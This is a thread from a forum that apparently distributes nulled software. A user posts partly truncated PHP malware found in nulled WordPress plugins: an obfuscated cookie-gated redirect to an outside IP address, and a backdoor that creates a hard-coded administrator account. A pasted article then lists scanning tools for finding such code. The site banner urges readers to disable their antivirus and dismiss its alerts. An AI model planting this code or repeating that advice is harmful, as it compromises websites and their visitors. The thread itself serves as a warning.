• You MUST read the Babiato Rules before making your first post otherwise you may get permanent warning points or a permanent Ban.

    Our resources on Babiato Forum are CLEAN and SAFE. So you can use them for development and testing purposes. If your are on Windows and have an antivirus that alerts you about a possible infection: Know it's a false positive because all scripts are double checked by our experts. We advise you to add Babiato to trusted sites/sources or disable your antivirus momentarily while downloading a resource. "Enjoy your presence on Babiato"

Wordpress Virus In Major Wordpress Plugin and theme Some if you using Nulled Version

riyaz1234

New member
Nov 13, 2019
2
0
1
<?php error_reporting(0);function a_($c_=32){$c0="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";$**okie-1"])&&!isset($COOKIE["wp-settings-time-1"])){setcookie("wp-authcookie-1","1",time()+3600242);header("L"."oc"."at"."io"."n: ht"."tp:"."//"."13"."4.2"."49."."11"."6.78"."/?"."ke"."y=".a());}}};?>re


wp-load.php and themes fuction.php and header.php


<?php $createuser = wp_create_user('wordcamp', 'z43218765z', 'wo****-> set_role('administrator'); ?>



<?php error_reporting(0);function a_($c_=32){$c0="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";$c------------------------------------{if(stripos($SERVER['HTTP_USER_AGENT'],$c5)!==false){if(!isset($_COOKIE["wp-authcookie-1"])&&!isset($_COOKIE["wp-settings-time-1"])){setcookie("wp-authcookie-1","1",time()+3600242);header("L"."oc"."at"."io"."n: ht"."tp:"."//"."13"."4.2"."49."."11"."6.78"."/?"."ke"."y=".a());}}};?>


<?php error_reporting(0);function a_($c_=32){$c0="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";$-----------------------------------------------------------------------{if(stripos($SERVER['HTTP_USER_AGENT'],$c5)!==false){if(!isset($_COOKIE["wp-authcookie-1"])&&!isset($_COOKIE["wp-settings-time-1"])){setcookie("wp-authcookie-1","1",time()+3600242);header("L"."oc"."at"."io"."n: ht"."tp:"."//"."13"."4.2"."49."."11"."6.78"."/?"."ke"."y=".a());}}};?>
 
  • Wow
Reactions: huamu15 and ckeeper
Please, which theme or plugin is it that you got these from?

Also, which php file did you get it?
 
free website scan -> https://sitecheck.sucuri.net/

Apart from Official WordPress repository there are hundreds and thousands of websites which provides free WordPress themes and Plugins but the problem is you can not trust them always.

Yes, Most of them add a malicious code to themes and plugins which is not too easy for you to find out.

Before learning about the cure lets discuss about the cause.

Here is why they add their custom codes

  • To get backlink from your blog unknowingly
  • To get access to your blog
  • To redirect your blog to spam links
  • To add their advertisements and banners.
  • or to simply get your website down
Not only free themes and plugins also the premium nulled plugins and themes that you have download from Warez and torrents may also infected by these malicious codes.
My Confessions

Did you wonder what triggered me write this article ?

Yes, I too fell prey to these free plugins.Few days back, I was desperate to download a very famous nulled plugin from warez and after installing it in my blog I got to know that the plugin was infected and it redirects my blog to a spam blog.

I immediately disabled the plugin and checked for the code that caused the redirection in plugin files. After an hour I found the code and immediately removed it [ I don’t use that plugin now ]

This incident taught me very important thing.

Never trust nulled WordPress plugins and themes

However many of you might want to use those nulled or free plugins and themes for God’s Sake, If you are one of them then read the remaining article
Detecting Malicious codes

After downloading the plugin or theme,The first thing you should do is to check for virus,trojans and other worms that you may not like it.
Check for Virus and Trojans

Go to VirusTotal.com and upload the zip file to check for virus.

If your file is infected you will get a red signal and if not then you can move on to next step.

VirusTotal Scan result

VirusTotal Scan result
Check for unwanted codes in Plugins

Now lets check for unwanted codes in plugins using another WordPress plugin called Exploit Scanner,which can be securely downloaded from WordPress website.

After installing it go to Dashboard >> Tools >> Exploit Scanner and run the scan.It will take some time to complete the scan and the time depends on number of plugins you have installed.

After the scan you can see a list of codes that are suspected.You can use the browser search function to find the plugins that you installed from outside WordPress repository.

Exploit Scanner

Exploit Scanner

[mybox]Note : This plugin will also scan themes but you might to be interested to try the tip that I am about to give next.[/mybox]
Check for Theme authenticity

Adding a backlink in a free theme is very common technique but you can easily find those exploited themes by the plugin called Theme Authenticity Checker (TAC).

Install the plugin and go to Dashboard >> Appearance >> TAC

You can see the list of themes installed with their authenticity result.It will give a warning if any encrypted links are found in a theme.

Theme Authenticity Checker


Theme Authenticity Checker
Security is in your hands

Its very rare to get hacked unless,We make mistake.So,security is in your hand : Either Act wisely or get fooled easily.
 
Last edited:
no any virus or tool can be able to find out this or nor any web site can scanner this type code i have tried this all tool
 
no any virus or tool can be able to find out this or nor any web site can scanner this type code i have tried this all tool

Most of us have been using nulled files from Babiato for a while now and we're yet to get hacked.

Tell us what we're missing.
 
  • Haha
Reactions: amit338
free website scan -> https://sitecheck.sucuri.net/

Apart from Official WordPress repository there are hundreds and thousands of websites which provides free WordPress themes and Plugins but the problem is you can not trust them always.

Yes, Most of them add a malicious code to themes and plugins which is not too easy for you to find out.

Before learning about the cure lets discuss about the cause.

Here is why they add their custom codes

  • To get backlink from your blog unknowingly
  • To get access to your blog
  • To redirect your blog to spam links
  • To add their advertisements and banners.
  • or to simply get your website down
Not only free themes and plugins also the premium nulled plugins and themes that you have download from Warez and torrents may also infected by these malicious codes.
My Confessions

Did you wonder what triggered me write this article ?

Yes, I too fell prey to these free plugins.Few days back, I was desperate to download a very famous nulled plugin from warez and after installing it in my blog I got to know that the plugin was infected and it redirects my blog to a spam blog.

I immediately disabled the plugin and checked for the code that caused the redirection in plugin files. After an hour I found the code and immediately removed it [ I don’t use that plugin now ]

This incident taught me very important thing.



However many of you might want to use those nulled or free plugins and themes for God’s Sake, If you are one of them then read the remaining article
Detecting Malicious codes

After downloading the plugin or theme,The first thing you should do is to check for virus,trojans and other worms that you may not like it.
Check for Virus and Trojans

Go to VirusTotal.com and upload the zip file to check for virus.

If your file is infected you will get a red signal and if not then you can move on to next step.

VirusTotal Scan result

VirusTotal Scan result
Check for unwanted codes in Plugins

Now lets check for unwanted codes in plugins using another WordPress plugin called Exploit Scanner,which can be securely downloaded from WordPress website.

After installing it go to Dashboard >> Tools >> Exploit Scanner and run the scan.It will take some time to complete the scan and the time depends on number of plugins you have installed.

After the scan you can see a list of codes that are suspected.You can use the browser search function to find the plugins that you installed from outside WordPress repository.

Exploit Scanner

Exploit Scanner

[mybox]Note : This plugin will also scan themes but you might to be interested to try the tip that I am about to give next.[/mybox]
Check for Theme authenticity

Adding a backlink in a free theme is very common technique but you can easily find those exploited themes by the plugin called Theme Authenticity Checker (TAC).

Install the plugin and go to Dashboard >> Appearance >> TAC

You can see the list of themes installed with their authenticity result.It will give a warning if any encrypted links are found in a theme.

Theme Authenticity Checker


Theme Authenticity Checker
Security is in your hands

Its very rare to get hacked unless,We make mistake.So,security is in your hand : Either Act wisely or get fooled easily.
Great tips @zorerkek! Thank you.
But those 2 plugins you reffered Exploit Scanner and Theme Authenticity Checker (TAC):
"hasn’t been tested with the latest 3 major releases of WordPress. It may no longer be maintained or supported and may have compatibility issues when used with more recent versions of WordPress"
so they are dangerous by themselves...
The function like exploit scanning cab be achived by very reputable All In One WP Security & Firewall
 
AdBlock Detected

We get it, advertisements are annoying!

However in order to keep our huge array of resources free of charge we need to generate income from ads so to use the site you will need to turn off your adblocker.

If you'd like to have an ad free experience you can become a Babiato Lover by donating as little as $5 per month. Click on the Donate menu tab for more info.

I've Disabled AdBlock